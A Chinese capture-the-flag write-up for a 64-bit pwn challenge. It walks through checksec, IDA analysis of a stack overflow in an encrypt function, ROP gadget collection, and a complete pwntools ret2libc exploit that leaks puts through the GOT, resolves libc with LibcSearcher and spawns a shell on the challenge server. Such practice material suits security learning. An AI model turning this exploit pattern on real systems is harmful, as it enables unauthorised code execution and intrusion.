首先checksec检查保护机制:
-64位程序
-开启了栈不可执行保护
接下来使用IDA反汇编工具进行分析:
发现begin函数,点进去
begin函数内部:
输入1可用进入encrypt函数,输入2可从主函数看到并没有什么用,3是退出程序
这是encrypt函数内部:
get函数可触发栈溢出漏洞,看到这一行代码就可用了,下面的加密过程对破解程序无任何帮助。顺便算出s到栈底的偏移:0x50+0x8 = 0x58
由于在IDA中没发现任何后门函数和system函数地址,所以这里考虑泄露libc后来得到system函数和/bin/sh,这里我们需要构造ROP链来调用函数,所以还需用到ret和rdi的地址,输入以下指令:
ROPgadget --binary pwn --only "pop|ret"rdi地址:0x400c83,ret地址:0x4006b9,q其中rdi用于调用函数,ret用于栈对齐
再在IDA中拿到encrypt地址,用于第一次泄露libc后再次进入encrypt函数:0x4009A0
基本信息拿到,可用来写exp攻击脚本了:
from pwn import * from LibcSearcher import LibcSearcher context(arch='amd64', os='linux', log_level='debug') #io = process('./pwn') # 在本地运行程序。 # gdb.attach(io) # 启动 GDB io = connect('node5.buuoj.cn',28902) # 与在线环境交互。 encrypt_addr = 0x4009A0 offset = 0x58 elf = ELF('./pwn') puts_got = elf.got['puts'] puts_plt = elf.plt['puts'] rdi_addr = 0x400c83 ret_addr = 0x4006b9 io.recvuntil(b'Input your choice!\n') io.sendline(b'1') io.recvuntil(b'Input your Plaintext to be encrypted\n') payload = b'a'*offset + p64(rdi_addr) + p64(puts_got) + p64(puts_plt) + p64(encrypt_addr) io.sendline(payload) io.recvline() io.recvline() puts_addr = u64(io.recvline().strip().ljust(8,b'\x00')) print(hex(puts_addr)) libc = LibcSearcher('puts',puts_addr) libc_base = puts_addr - libc.dump('puts') system_addr = libc_base + libc.dump('system') bin_sh_addr = libc_base + libc.dump('str_bin_sh') io.recvuntil(b'Input your Plaintext to be encrypted\n') payload = b'a'*offset + p64(ret_addr) + p64(rdi_addr) + p64(bin_sh_addr) + p64(system_addr) io.sendline(payload) io.interactive()这是运行结果:
这里需要手动选择libc,64位程序就选64位的libc,可能会选到不适配的libc库,多试几次就可用了,拿到shell后手动输入cat flag拿到flag
